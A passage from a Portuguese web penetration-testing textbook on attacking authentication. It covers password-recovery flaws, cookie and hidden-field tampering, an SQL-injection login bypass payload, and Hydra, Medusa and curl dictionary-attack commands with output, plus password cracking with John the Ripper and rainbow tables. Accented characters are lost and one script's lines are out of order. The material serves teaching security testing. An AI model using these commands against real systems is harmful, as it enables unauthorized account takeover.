1 Inexistncia de mecanismo de bloqueio.

1 Cadastro de perguntas secretas personalizadas.
1 Respostas disponveis em fontes pblicas.
1 Envio da senha original para uma conta pr-cadastrada de correio eletrnico.
1 Redirecionamento para uma sesso autenticada.
1 Solicitao da conta de correio eletrnico, para a qual as instrues para recuperao de
senha devem ser enviadas, aps perguntas secretas serem respondidas corretamente.
1 Recuperao de senha por equipe de suporte.

1 Falta de notificao de troca de senha.
1 Inexistncia de mecanismo de bloqueio: se a aplicao no impedir que mltiplas tentativas malsucedidas e consecutivas de resposta s perguntas secretas sejam efetuadas,
a execuo de um ataque de fora bruta facilitado.
1 Cadastro de perguntas secretas personalizadas: usurios tendem a registrar perguntas, que so facilmente respondidas, como, por exemplo, voc gosta de futebol?
ou quantos filhos voc tem?. Note que as respostas das duas perguntas pertencem a
conjuntos de baixa cardinalidade.
1 Respostas disponveis em fontes pblicas: mesmo quando as respostas das perguntas

secretas escolhidas no so fceis de adivinhar, o mecanismo reduzido a p se o
usurio disponibiliza as informaes necessrias em redes sociais, pginas pessoais ou
qualquer outra fonte pblica. Note que essa fraqueza, na verdade, no da aplicao,
mas, sim, de natureza humana.
1 Envio da senha original para uma conta pr-cadastrada de correio eletrnico: similar
exibio da senha em tela, permite usar a aplicao, sem que o usurio legtimo saiba
do comprometimento. Porm, mais difcil de explorar, pois requer que o atacante descubra a conta de e-mail do usurio e a senha correspondente.
1 Redirecionamento para uma sesso autenticada, aps perguntas secretas serem

respondidas corretamente: atacante consegue usar a conta comprometida indefinidamente, sem a cincia do usurio legtimo.
1 Solicitao da conta de correio eletrnico, para a qual as instrues para recupeTeste de Invaso de Aplicaes Web
rao de senha devem ser enviadas, aps perguntas secretas serem respondidas
corretamente: basta fornecer uma conta de e-mail, qual se tem acesso, para receber a
senha em claro ou um link para um formulrio, no qual ela pode ser redefinida. Observe
que algumas aplicaes no solicitam a conta de e-mail de destino, mas a embutem em
um campo escondido. Nesse caso, suficiente utilizar um proxy de interceptao para
alterar o valor do campo e obter o mesmo resultado.
1 Recuperao de senha por equipe de suporte: em aplicaes utilizadas internamente

em uma empresa, comum delegar equipe de suporte o trabalho de recuperao de
senhas. Embora isso no seja uma vulnerabilidade por si s, o problema surge quando a
identidade do requerente no validada, antes do fornecimento de nova senha. Se isso
acontece, um atacante pode simplesmente ligar para o suporte, informando um identificador de usurio qualquer, para conseguir acesso ao sistema.
102
1 Falta de notificao de troca de senha: uma boa prtica de segurana sempre

Corresponde violao
de polticas implcitas e
explcitas de segurana
da informao.
permitir a deteco de incidentes de segurana, se no for possvel evit-los. Assim,

quando houver uma troca de senha, por meio do mecanismo de recuperao, uma mensagem de notificao deve ser enviada a uma conta pr-cadastrada de correio eletrnico,
pertencente ao usurio legtimo. Com esse controle, mesmo que uma conta seja comprometida, o proprietrio ficar ciente do fato e poder agir, diminuindo o dano causado.
Funcionalidade Lembrar usurio

Algumas aplicaes web disponibilizam uma funcionalidade que permite lembrar o
usurio, automaticamente, toda vez que forem utilizadas.

Isso implementado por meio de um cookie persistente, contendo o identificador do
usurio, que armazenado pelo navegador web e enviado toda vez que o domnio que o
definiu acessado.
Se o mecanismo ativado em um computador de uso pblico, a conta da ltima pessoa que
usou a aplicao revelada, possibilitando o mesmo conjunto de ataques, decorrente da

enumerao de usurios. Um cenrio mais grave resulta quando a aplicao usa o cookie
para autenticar o usurio, automaticamente, sem a necessidade de fornecimento de senha.
Nesse caso, fica evidente que o roubo do cookie suficiente para uma pessoa maliciosa
acessar o sistema, de maneira no autorizada, mesmo desconhecendo, completamente,
quaisquer credenciais vlidas. A subtrao do cookie pode ser executada por meio de um
ataque cross-site scripting (Captulo 5), comprometimento da mquina do usurio ou em
trnsito, quando um canal seguro no utilizado (Captulo 9).
Uma pequena variao no ataque acima permite que um usurio legtimo escale privil-
gios na aplicao.
Para isso, ele precisa apenas alterar o valor do atributo que indica o usurio, para o identificador de uma conta com mais privilgios. Por exemplo, se o cookie possui um par
usuario=fulano, sabendo-se da existncia da conta admin, basta realizar a modificao
usuario=admin para concluir a explorao. No caso de um teste caixa-cinza, em que
algumas contas de acesso so fornecidas para o analista de segurana, a presena dessa
vulnerabilidade permite se conectar com qualquer conta conhecida.
Transporte inseguro de credenciais de acesso

Quando existe a possibilidade de credenciais de acesso serem enviadas para o destino
incorreto ou capturadas em trnsito, diz-se que so transportadas de maneira insegura. A falha mais comum nesse sentido consiste no envio das informaes em claro ou
apenas codificadas, o que permite que sejam interceptadas em qualquer ponto entre a
origem e o destino.
Postar os dados de formulrios de autenticao ou as credenciais obtidas pelo mtodo
Basic, por meio do protocolo HTTP simples, , portanto, uma prtica totalmente vulnervel,
que jamais deve ser adotada. Para exemplificar, a Figura 3.15 ilustra dados de autenticao
Basic capturados, a partir da escuta da rede, que podem ser facilmente decodificados para
esruser: esruser.
comum encontrar na internet aplicaes web que enviam as informaes de autenticao, via protocolo HTTPS, mas que fornecem a pgina para captur-las, empregando
Incidente de segurana
HTTP simples.
103
Se, por um lado, no factvel obter, a partir da rede, os dados de conta submetidos ao
servidor da aplicao, por outro possvel violar a integridade da pgina de autenticao
injetando cdigo malicioso para captura de teclas digitadas ou alterando os elementos da
pgina apresentada, de modo a redirecionar as informaes para outro destino. Portanto,
fundamental que a pgina, na qual o usurio digita identificador e senha, seja provida por
canal seguro.
Outra vulnerabilidade, que afeta a transmisso das credenciais, consiste na passagem
dessas informaes como parmetros da URL.

Mesmo que um canal seguro seja empregado, o identificador e senha fornecidos pelo
usurio so mantidos no histrico de navegao e em trilhas de auditoria do servidor
web. Se este estiver mal configurado, do ponto de vista de segurana, permitindo acesso
aos arquivos do sistema, um atacante pode copiar as trilhas mencionadas e extrair delas
diversas credencias vlidas.
Finalmente, a camada SSL/TLS, provida pelo servidor web, pode estar mal configurada
e permitir o uso de verses vulnerveis desses protocolos, alm de sutes criptogrficas

fracas, sujeitas a ataques criptoanalticos.
Esses problemas so discutidos em detalhes no Captulo 9, que trata de falhas nos mecanismos criptogrficos.
Falhas na implementao do mecanismo

Uma das regras de ouro em desenvolvimento de software seguro determina que, em
104
caso de falhas inesperadas, a aplicao deve sempre se manter em um estado seguro.

Por exemplo, se por um motivo qualquer, a conexo com a base de usurios finalizada,
impedindo o processo de autenticao, o acesso do reclamante deve ser negado. Infelizmente, essa diretriz bsica no seguida em profuso, conduzindo a diversos tipos de
vulnerabilidades, que afetam, sobretudo, os mecanismos de controle de acesso.
Considere a aplicao ilustrada na Figura 3.16, que permite acesso s reas sensveis,
somente aos usurios devidamente autenticados e autorizados. Observe que o nome de
usurio e a senha so enviados, em dois parmetros distintos, por meio do mtodo POST,
quando o boto Login clicado.
Figura 3.15
Dados de autenticao HTTP Basic
capturados em
trnsito.
Figura 3.16
Tela de autenticao
e formato
da requisio.
Se a aplicao no tratar erros inesperados adequadamente, conforme discutido, um
usurio malicioso pode se autenticar, mesmo sem conhecimento da senha correspondente. Um teste que deve ser executado, ento, resume-se na remoo de um ou mais
parmetros esperados pela aplicao, antes do envio da requisio, para induzir a ocorrncia de um erro.
Isso pode ser realizado com auxlio de um proxy de interceptao, conforme ilustrado na Figura
3.17. Note que, de fato, o sistema apresenta a vulnerabilidade descrita e pode ser explorado.
Testes adicionais que devem ser realizados, com o mesmo objetivo acima exemplificado,
incluem:
1 Submisso de identificadores de usurio e de senhas maiores que o tamanho

mximo permitido pela aplicao.
1 Incluso de parmetros invlidos na requisio.

1 Envio de identificadores de usurio e de senha contendo caracteres no permitidos.
1 Submisso de valores vazios.
Vejamos agora outro tipo de problema, que afeta, comumente, aplicaes que armazenam
a base de usurios em um banco de dados relacional. A rotina que efetua a autenticao,
nesses casos, realiza uma consulta SQL ao banco, em busca de um registro que contenha o
identificador de usurio e senha fornecidos. Se nenhuma tupla for encontrada, o reclamante
no validado e o acesso ao sistema negado. O cdigo que realiza essa verificao, frequentemente, se assemelha ao apresentado na Figura 3.18, o qual, se percebe, vulnervel
injeo de SQL (Captulo 6).
Figura 3.17
Requisio efetuada
sem o parmetro
Password.
105
sComando = select count(*) into :nCount

from usuarios
where id = + sIdentificador + and
senha = + sSenha + ;
SqlExecute(hSql, sComando);
if (nCount > 0) print(Usurio autenticado);
Nesse cenrio, o mecanismo de autenticao pode ser quebrado com os seguintes passos:
1. Usurio malicioso digita o caractere no campo de identificador e descobre que a apli-
cao vulnervel injeo de SQL.

2. O atacante fornece o valor or 1=1;-- para o campo usurio e um valor qualquer para
a senha. A sequncia ;-- serve para comentar o restante da linha e evitar um erro de
sintaxe decorrente do texto que sobra.
3. A aplicao executa a consulta SQL:
select count(*) into :nCount

from usuarios
where id = or 1=1;-- and
senha = qualquervalor;
4. Como a expresso 1=1 uma tautologia, o where avaliado como verdadeiro para
todas as tuplas da tabela e a quantidade delas ser armazenada na varivel nCount.

Devido construo do if, que verifica se qualquer registro foi encontrado, a aplicao
autentica o usurio, mesmo sem ele saber a senha correta.
Encerramos o presente tpico com a anlise da rotina de autenticao ilustrada na Figura 3.19,
que est repleta de vulnerabilidades descobertas, no passado, em sistemas reais. Um problema que ainda no foi discutido neste texto est no lao das linhas 8-10, responsvel por
comparar a senha armazenada com a fornecida. Observe que o lao executado enquanto
no forem encontrados caracteres divergentes e o ndice for menor que o tamanho da
senha informada. Esse ltimo exatamente o ponto problemtico, pois permite que um
106
usurio se autentique, com uma senha de apenas um caractere, desde que corresponda ao
primeiro da senha armazenada. fcil perceber que um ataque de fora bruta, nesse caso,
seria trivialmente executado.
Figura 3.18
Exemplo de trecho
de cdigo empregado para autenticao de usurios,
que vulnervel
injeo de SQL.
01
public static boolean auth(String id, String pwd) {
02
String senhaArmazenada = getPwd(id);
03
boolean bAuth = senhaArmazenada != null;
04
05
try {
06
if (senhaArmazenada != null) {
07
pwd = pwd.toUpperCase();
08
for (int i = 0; i < pwd.length() && bAuth; i++) {
09
bAuth = pwd.charAt(i) == senhaArmazenada.charAt(i);
10
11
12
} catch (Exception e) {
13
14
15
16
return bAuth;
}
As demais vulnerabilidades do cdigo pertencem, em sua grande maioria, a classes j

discutidas anteriormente:
1 Considerando que o parmetro pwd corresponde senha digitada pelo usurio, as

senhas devem estar armazenadas em claro ou por mecanismo reversvel para que a comparao da linha 09 seja possvel.
1 Se um identificador vlido e uma senha nula so passados como argumentos para a

funo, a autenticao bem-sucedida, porque a linha 07 gera uma exceo, que evita a
comparao das senhas e faz com que o valor corrente de bAuth, iniciada com true, seja
devolvido.
1 A rotina retorna true, caso sejam fornecidas uma conta vlida e a senha correta adicionada de um sufixo qualquer. A razo disso que senhaArmazenada.charAt(i), na linha 09,
gera uma exceo, quando o primeiro caractere do sufixo comparado, fazendo com que
o valor corrente da varivel bAuth seja devolvido.
1 A linha 07 indica que no so diferenciadas letras maisculas de minsculas, o que

implica uma grande reduo no nmero de senhas possveis, favorecendo um ataque de
fora bruta.
Mecanismo vulnervel de troca de senhas

Diversos padres de segurana, como o PCI DSS demandam que senhas de usurios
sejam trocadas periodicamente.
Figura 3.19
Rotina de autenticao com diversas
vulnerabilidades.
107
As justificativas para a adoo dessa prtica resumem-se em diminuir a janela de exposio

de uma conta comprometida e dificultar ataques contra arquivos de senhas, pois, na ocasio
em que uma delas seja encontrada, no ter mais utilidade nenhuma, por j ter sido alterada (Stuttard e Pinto, 2007).
Visando satisfazer o supracitado requisito, muitas aplicaes incluem uma funciona-
lidade para troca de senhas, mas nem todas a implementam de maneira segura. Um
problema muito comum deixar de pedir a senha atual nesse processo, porque a tela
para efetuar essa operao s acessvel a usurios autenticados.
Para ilustrar como isso pode ser atacado, consideremos um cenrio em que a nova senha
solicitada duas vezes, o identificador do usurio atual mantido em um campo escondido
e o formulrio submetido por POST. Nesse contexto, possvel alterar a senha de outro
usurio da seguinte maneira:
1. Um usurio malicioso habilita um proxy local, para interceptar todas as requisies feitas
para a aplicao.
2. Ele se autentica na aplicao e, em seguida, acessa a pgina para troca de senhas,
residente na rea protegida.

3. O atacante digita duas vezes a nova senha, nos campos correspondentes, e envia a requi-
sio, que interceptada pelo proxy. De modo a completar o ataque, ele altera o valor
do campo escondido, para o identificador da vtima, cuja senha , ento, trocada pela
escolhida.
4. A partir disso, a conta comprometida fica disponvel para acesso no autorizado, at que o
usurio legtimo defina nova senha, quando, ento, o ataque pode ser novamente executado.
Autenticao com mltiplos fatores

Conforme vimos, sistemas que manipulam informaes crticas so fortes candidatos a
empregar mltiplos fatores de autenticao, porque requerem um alto nvel de segurana.

Um claro exemplo disso so as aplicaes de internet banking, com as quais grandes somas
de dinheiro so transferidas diariamente, entre diversas contas e entidades. Por mais
simples que seja o tipo de conta, necessrio, pelo menos, saber uma senha, diferente da
utilizada nos caixas fsicos, e possuir algum tipo de token, normalmente, na forma de uma
cartela de valores. Para clientes que esto sujeitos a maior risco, como as pessoas jurdicas,
por exemplo, so empregados, muitas vezes, at trs fatores de autenticao.
Uma sesso em uma aplicao desse tipo comea, tipicamente, com a autenticao do
usurio por meio da senha, o que permite acesso a diversas funcionalidades bsicas.
Quando uma operao envolvendo valores financeiros solicitada, o usurio precisa
108
fornecer novamente a senha e utilizar o segundo fator, para comprovar sua identidade.
Uma implementao segura desse cenrio requer que as informaes de autenticao
j validadas sejam mantidas exclusivamente no servidor e que etapas do processo no
possam ser ignoradas.
A falta de observao desses importantes preceitos o que conduz a vulnerabilidades em
tais solues, conforme ilustrado nos cenrios abaixo (Stuttard e Pinto, 2007):
1 Informaes sobre as diversas etapas da autenticao so mantidas em parmetros

enviados ao lado cliente, como tokenValidado=N, por exemplo. Um teste imediato que
deve ser efetuado trocar o valor para S ou Y, efetuar uma requisio aplicao e ver
como o sistema se comporta. Em situaes assim, h grande chance de o processo de
autenticao ser evadido, obtendo-se com isso acesso no autorizado ao sistema.
1 Uma aplicao, que usa cartelas de senha como segundo fator de autenticao, mantm,
em um campo escondido, o identificador do usurio corrente, uma vez que este j tenha
se autenticado por senha. Nas requisies subsequentes, o sistema extrai o nome da
conta a partir desse campo, em vez de obt-lo a partir do objeto de sesso salvo no servidor. Um teste que pode ser realizado consiste em interceptar uma requisio de autenticao via segundo fator e alterar o par (identificador, valor da cartela) com os dados
de outro usurio. Se a operao for realizada com sucesso, significa que a aplicao no
amarra as diversas etapas da autenticao corretamente.
1 A rotina que trata uma determinada operao assume que, se foi chamada, todos os
fatores de autenticao j foram validados. O problema nesse caso que a premissa
adotada pode ser falsa e o correto, ento, consiste em verificar se todas as etapas foram
completadas com sucesso, antes de atender a solicitao. Para testar a presena dessa
vulnerabilidade, todos os passos da operao devem ser executados com uma conta vlida,
para que as diversas requisies aplicao sejam mapeadas. Em seguida, deve-se tentar
repetir as requisies identificadas, mas desconsiderando aquelas referentes ao processo
de autenticao. Se nenhum erro ocorrer, a aplicao se encontra vulnervel.
Ataque de fora bruta

Um ataque de fora bruta consiste em tentar se autenticar com todas as senhas pos-
sveis, at que o processo seja bem-sucedido. A tarefa pode se estender por um longo
perodo de tempo, dependendo do tamanho mnimo de senha adotado e do total de
possibilidades por posio. Devido ao trfego que gera, a tcnica extremamente
ruidosa e, por isso, facilmente percebida por dispositivos de deteco de intruso.
Se um controle de bloqueio de contas, por mltiplas tentativas invlidas de autenticao,
estiver implementado, as contas da aplicao sero rapidamente travadas.
Por todas essas desvantagens, um ataque desse tipo deve ser utilizado somente como
ltimo recurso de um teste de invaso caixa-preta, quando nenhuma outra vulnerabilidade pde ser encontrada.
configurado de diversas maneiras diferentes, contra diversos tipos de protocolos. A Figura 3.20
ilustra um exemplo de uso bem-sucedido dessa ferramenta, que possibilitou encontrar a
senha juk para a conta esr.
Um software antigo, mas que permite realizar esse tipo de teste, o Brutus, o qual pode ser
109
Ataque de dicionrio
Como vimos, um ataque de fora bruta apresenta diversos problemas, podendo
demorar muito tempo para atingir um resultado positivo se o espao de senhas for
demasiado grande. A falha na abordagem que todas as senhas so consideradas poss-
Figura 3.20
Ataque de fora
bruta contra Autenticao Basic.
veis candidatas, embora usurios raramente escolham sequncias sem sentido.

Em vez disso, para facilitar a memorizao, a grande maioria das pessoas utiliza palavras
do idioma, nomes de familiares, datas, nmeros de documento e pequenas variaes. Por
exemplo, n0rm@2011 pode ser usado no lugar de norma2011.
Tendo esse fato em mente, uma abordagem mais inteligente resulta no ataque de dicionrio,
que seleciona as senhas para teste a partir de uma lista de palavras comuns e variaes.
Com essa estratgia, senhas improvveis para a maioria dos usurios so descartadas,
economizando com isso uma boa parcela de tempo. Observe, no entanto, que, apesar do
universo reduzido de senhas a serem testadas, as questes de bloqueio de conta e deteco

por dispositivos de segurana continuam presentes.
Alguns exemplos de utilitrios, que podem ser empregados para realizar ataque de
dicionrio contra aplicaes web, incluem:
1 Brutus: um software livre, fornecido nativamente apenas para plataformas

Windows, mas que pode ser executado tambm em Linux, via Wine. Permite testar
autenticao HTTP Basic e a baseada em formulrios, alm de outros servios.
1 THC Hydra: distribudo sob licena GPLv3, funciona em todas as plataformas Unix/
Linux, Mac OS/X, Windows com Cygwin e PalmOS. Suporta HTTP Basic, HTTP Digest,
autenticao baseada em formulrios e verses protegidas por SSL/TLS, alm de inmeros outros servios. Alm disso, prov uma interface grfica chamada de xHydra.
110
Cygwin
Arcabouo que permite
compilar aplicaes
desenvolvidas para
Linux, em ambientes
Windows, por meio de
uma camada, na forma
de uma biblioteca
dinmica que prov
grande parte da
funcionalidade da
API Linux.
1 Medusa: fornecido sob licena GPLv2, com suporte a todas as plataformas Unix/Linux,
Mac OS/X e Windows com Cygwin. Suporta HTTP Basic, HTTP Digest, autenticao baseada
em formulrios e verses protegidas por SSL/TLS, alm de inmeros outros servios.
Vejamos agora como funcionam essas ferramentas. A Figura 3.21 ilustra o resultado de um
ataque bem-sucedido do Brutus contra autenticao HTTP Basic, o qual revelou um usurio
esruser com senha idntica. Comparando com a configurao da Figura 3.20, utilizada para
fora bruta, percebe-se que as diferenas residem no modo Word List e no fornecimento de
arquivos contendo listas de palavras para identificador de usurio e para senha.
Para executar o mesmo teste acima com o utilitrio Medusa, deve-se digitar o seguinte comando:
~$ medusa -h exemplo.esr.rnp.br -U ids -P ids -e ns -M http 8

-m DIR:basic/ -v 4
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
<jmk@foofus.net>
ACCOUNT FOUND: [http] Host: exemplo.esr.rnp.br User: esruser

Password: esruser [SUCCESS]
As opes do programa utilizadas no cenrio so:
1 -h indica o nome de domnio do alvo.

1 -U arquivo contendo lista de identificadores de usurio, um por linha.
Figura 3.21
Ataque de dicionrio contra Autenticao Basic.
1 -P arquivo contendo dicionrio de senhas, um item por linha.

111
1 -e n serve para testar senha nula e s, senha idntica ao identificador.

1 -M indica o mdulo a ser carregado para o teste.
1 -m parmetros passados para o mdulo.
1 -v controla a quantidade de informaes exibidas ao usurio.
O prximo exemplo ilustra um teste de dicionrio, efetuado pela ferramenta Hydra, contra
o mecanismo de autenticao HTTP Digest, que revelou, com sucesso, a conta esruser com
senha esruser. Note-se que a sintaxe apresenta certa semelhana com a da Medusa, o que
esperado, considerando que os dois programas possuem o mesmo propsito. As opes
-L e -P indicam, respectivamente, os nomes dos arquivos contendo os dicionrios de
identificadores de usurio e de senhas; -e ns testa com senha nula e igual ao identificador;
http-head define o protocolo e o mtodo; por fim, o ltimo parmetro varia de acordo com
o servio e , no caso de http-head, especifica a pgina que requer autenticao.
~$ hydra -L ids -P pwds -e ns exemplo.esr.rnp.br http-head /digest/

Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use
allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-28 23:26:19
[DATA] 16 tasks, 1 servers, 48 login tries (l:6/p:8), ~3 tries per
task
[DATA] attacking service http-head on port 80
[STATUS] attack finished for exemplo.esr.rnp.br (waiting for children
to finish)
[80][www] host: 192.168.213.200
login: esruser
password: esruser
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-28 23:26:23

Trocando-se http-head por http[s]-form-post, possvel realizar o teste contra um
sistema que utiliza autenticao baseada em formulrio. As informaes necessrias para
construo da requisio devem ser passadas no ltimo parmetro, de acordo com o
seguinte formato:
<url do autenticador>:<parmetros da requisio>:<mensagem de erro>

H duas variveis especiais, ^USER^ e ^PASS^ , que so substitudas, na execuo de
Hydra, por todas as possveis combinaes de identificador de usurio e de senha formadas
a partir das listas de palavras passadas pelo analista. Por esse motivo, devem ser empregadas, na requisio HTTP, como os valores dos parmetros referentes s credenciais de
acesso de usurio.
O resultado disso tudo, quando aplicado ao formulrio da Figura 27, o comando abaixo
ilustrado. Um ponto importante que deve ser observado que a sintaxe s permite destacar
uma nica mensagem de erro. Porm, no cenrio em questo, a aplicao web exibe textos
diferentes para senha incorreta e usurio inexistente. Consequentemente, se a lista de
identificadores passada por meio da opo -L contiver usurios invlidos, falsos positivos
ocorrero, porque o utilitrio no conseguir interpretar a mensagem de erro devolvida.
~$ hydra -L ids -P pwds -e ns form-auth.esr.rnp.br http-post-form 8

/login.php:userid=^USER^&senha=^PASS^&Submit1=Login:incorreta
112
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use
allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-29 01:54:53
[DATA] 16 tasks, 1 servers, 40 login tries (l:5/p:8), ~2 tries per
task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 192.168.213.200
login: admin
password:
admin
[80][www-form] host: 192.168.213.200
login: user
password: 123
[STATUS] attack finished for form-auth.esr.rnp.br (waiting for

children to finish)
[80][www-form] host: 192.168.213.200
login: usuario
password:
senha
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-29 01:54:54
Essa limitao apresentada pelo utilitrio Hydra pode ser facilmente superada, por meio
de uma adaptao no script da Figura 3.12, utilizado para enumerao de usurios. Basicamente, um lao externo deve ser adicionado para varrer o dicionrio de senhas, e o
comando condicional, limitado ao caso de autenticao bem-sucedida. A Figura 3.22 exibe o
novo script, contendo as alteraes necessrias.
# !/bin/bash
for pwd in $(cat pwds)

do
for id in $(cat ids)
do
http://form-auth.esr.rnp.br/login.php | \
grep -c bem-vindo) -ne 0 ];
then
echo ($id, $pwd)
Figura 3.22
Script para teste de
dicionrio contra
formulrios de
autenticao.
fi
done
done
if [ $(curl -s --data userid=$id&senha=$pwd&Submit1=Login \
113
Ataque contra senhas armazenadas

Durante um teste de invaso em aplicaes web, no raro obter senhas a partir de
arquivos e bancos de dados.

Quando isso acontece, ou elas esto armazenadas completamente em claro ou so protegidas
por algum mecanismo criptogrfico, mas de maneira vulnervel. No melhor caso, quando a
proteo das senhas em disco feita corretamente, pode ocorrer de a qualidade delas ser
muito baixa, devido a usurios no conscientizados em segurana da informao.
Qualquer que seja o cenrio, entretanto, o objetivo a ser perseguido sempre a extrao
de credenciais vlidas para acesso ao sistema alvo. Para isso, podem ser utilizadas tcnicas
baseadas em criptoanlise, tema do Captulo 9, ou calcadas na fraqueza das senhas.
Um timo utilitrio, nesse contexto, o John the Ripper, disponvel para diversas plataformas, sob licena GPLv2, e com suporte nativo a arquivos de senhas de sistemas Unix/
Linux, Windows e Kerberos/AFS. Visando um maior desempenho, em vez de utilizar a API
crypt, alguns dos algoritmos criptogrficos e rotinas de suporte foram desenvolvidos diretamente em linguagem Assembly, para vrias arquiteturas diferentes, sobretudo x86.
H trs modos de operao pr-definidos, que adotam estratgias diferentes para recu-
perao das senhas, a partir dos arquivos protegidos:
1 Single-crack: utiliza como candidatas a senhas o prprio identificador de usurio,

campo GECOS, diretrio home da conta e diversas variaes sobre esses valores.
GECOS
Se uma senha validada, ela automaticamente testada contra as demais contas
uma entrada no
arquivo /etc/passwd,
em sistemas Unix/Linux,
que contm informaes
sobre a conta de
usurio, como nome e
telefone, por exemplo.
fornecidas, sob a hiptese de uma senha padro ser adotada no ambiente.
1 Lista de palavras: efetua um ataque de dicionrio com base na lista de palavras

fornecidas e variaes definidas pelas regras habilitadas. Palavras repetidas no so
desconsideradas e o processo executado mais rapidamente se houver mudana de
apenas poucos caracteres entre valores consecutivos.
1 Incremental: realiza um ataque de fora bruta, variando os caracteres de acordo

com o alfabeto definido para o teste. Para aumentar a eficcia, quando possvel, considera a frequncia de ocorrncia na lngua de sequncias especficas de trs letras,
utilizando as mais provveis primeiramente.
O exemplo abaixo ilustra a maneira mais simples de utilizar a ferramenta para quebrar
um arquivo de senhas. Quando nenhum parmetro adicional, alm do nome de arquivo,
passado na linha de comando, John the Ripper opera nos trs modos disponveis, na ordem
em que foram acima apresentados, at que o trabalho seja concludo, ou interrompido
pelo usurio. Observe-se que as senhas em claro, neste caso especfico, foram encontradas
aps meros 14 segundos. importante ter em mente, porm, que muitas vezes, se no na
maioria, a tarefa consumir tempo bem maior.
~$ john passwords
Loaded 3 password hashes with 3 different salts (Traditional DES
[64/64 BS MMX])
esruser
(esruser)
juk
(esr)
senhad
(hard)
guesses: 3
114
time: 0:00:00:14 (3)
c/s: 812046
trying: secKXy senhhr
Ataques de dicionrio so muito mais eficientes que os de fora bruta, porque senhas
improvveis no so testadas no processo. A eficcia do mtodo, porm, depende da

qualidade e tamanho da lista empregada de palavras, uma vez que a senha deve estar
contida nela, para o ataque funcionar.
Nos casos em que a tcnica utilizada contra arquivos de senhas, possvel conseguir um
grande ganho de desempenho, pois no preciso verificar as palavras uma a uma. A ideia
consiste em alterar a estrutura do dicionrio, de modo a incluir, para cada palavra, a contraparte protegida, que passa a ser a chave de busca. Desse modo, para cada senha protegida
do arquivo alvo, verifica-se se o dicionrio contm um registro correspondente e, em caso
positivo, a senha em claro a palavra associada.
Uma abordagem mais elegante, que permite reduzir o consumo de espao, resume-
-se no uso de rainbow tables, que foram introduzidas por Oeschslin (2003) como uma
melhoria do trabalho de Hellman (1980).
Para a explicao a seguir, considere-se que as senhas so protegidas, por meio de uma
funo de hash criptogrfica, denotada por h(x), e que Ri(x) corresponde a uma famlia de
funes que mapeiam hashes para senhas.
O elemento central da soluo o rainbow chain, que consiste em uma sequncia de
valores alternados de senhas e hashes, calculados a partir de uma senha inicial.

s1
h(s1)
h1
R1(h1)
s2
h(s2)
h(st-1)
ht-1
Rt-1(ht-1)
st
Diversas cadeias de mesmo comprimento so geradas, a partir de senhas iniciais diferentes, e somente o primeiro e ltimo elementos de cada uma delas so armazenados,
resultando em economia de espao.
Note que com esses valores possvel reconstruir qualquer cadeia na tabela, bastando para
isso aplicar alternadamente h(x) e Ri(x) senha inicial.
Para verificar se possvel recuperar a pr-imagem (senha) de um hash H qualquer, a partir
da tabela, os seguintes passos devem ser efetuados:
1. Seja a i-sima cadeia parcial a sequncia de valores alternados de hashes e senhas, calculados
a partir de Ri(H), com 1 i t 1:

R1(H)
si+1
h(si+1)
hi+1
Ri+1(hi+1)
h(st-1)
ht-1
Rt-1(ht-1)
st
2. Iniciando com i = t 1 e decrescendo at i = 1, calculam-se as cadeias parciais, at que
a senha final (s t) seja encontrada como elemento final de uma linha L da tabela. Se isso
ocorrer, procede-se ao passo seguinte; se no, o teste encerrado sem sucesso.
3. Neste passo, a cadeia reconstruda a partir da senha inicial recuperada da linha L, at hi,
o qual deve ser comparado contra H. Se os valores forem iguais, a senha procurada a si,
isto , aquela imediatamente anterior ao hi. Caso contrrio, obteve-se um falso alarme e o
processo deve retornar ao Passo 1, a partir da ltima cadeia parcial avaliada.
Na prtica, o processo de busca bem rpido, mas dependendo dos comprimentos de
senha contemplados e dos alfabetos utilizados, o tamanho total das tabelas pode ultrapassar vrios terabytes. Como o processo de gerao dessas tabelas bem demorado, o ideal
obt-las de algum lugar, j prontas, como o projeto Free Rainbow Tables, por exemplo. Nesse
H1
site, esto disponveis tabelas gratuitas para MD5, SHA-1 e NTLM, entre outros formatos.
115
Entre os exemplos de softwares que podem ser empregados para realizar ataques base-
ados em rainbow tables esto:
1 RainbowCrack: um conjunto composto por trs softwares, que permitem gerar

rainbow tables, orden-las e utiliz-las no processo de quebra de arquivos de senhas.
So compatveis com plataformas Linux e Windows e podem aproveitar-se de
processadores grficos que empregam tecnologia CUDA, aumentando consideravel-
CUDA
mente o desempenho do ataque.
Compute Unified
Device Architecture
uma arquitetura de
computao paralela,
criada pela Nvidia, capaz
de fornecer alto poder
de processamento,
utilizando os
processadores grficos
que produzem.
1 Ferramentas do projeto Free Rainbow Tables: so um conjunto de ferramentas

baseadas no RainbowCrack, mas que permitem o uso de tabelas indexadas e
hbridas, menores que as no formato original. Podem ser executadas nativamente em
sistemas Windows e Linux.
1 Cryptohaze GPU Rainbow Cracker: permite gerar e utilizar rainbow tables, as quais
podem ser indexadas para um maior desempenho. Suporta plataformas Windows,
Linux e Mac OS, em 64 bits, e requer a presena de um processador grfico com
suporte a CUDA.
O exemplo abaixo ilustra o uso do rcracki_mt, parte das ferramentas Free Rainbow Tables,
para encontrar a senha correspondente ao hash MD5, passado pela opo -h. Observe-se
que o processo todo durou pouco mais que trinta segundos e resultou na descoberta de
uma senha de seis letras minsculas seguidas de trs dgitos numricos. Antes disso, porm,
foram achadas 907 cadeias provveis, que conduziram a falsos alarmes. Para se ter ideia do
espao em disco necessrio, para a soluo desse cenrio foram empregadas tabelas que
totalizam cerca de 3 GBytes.
~$ rcracki_mt -h 2465d0454ec909560b45b72086604edf *.rti

Using 1 threads for pre-calculation and false alarm checking...
Found 4 rainbowtable files...
md5_hybrid(loweralpha#6-6,numeric#1-3)#0-0_0_10000x63130363_
distrrtgen[p][i]_0.rti:
reading index... 57605680 bytes read, disk access time: 0.87 s
reading table... 505042904 bytes read, disk access time: 7.22 s
verifying the file... ok
searching for 1 hash...
plaintext of 2465d0454ec909560b45b72086604edf is esrrnp240
116
cryptanalysis time: 3.05 s
statistics
------------------------------------------------------plaintext found:
1 of 1 (100.00%)
total disk access time:
8.10 s
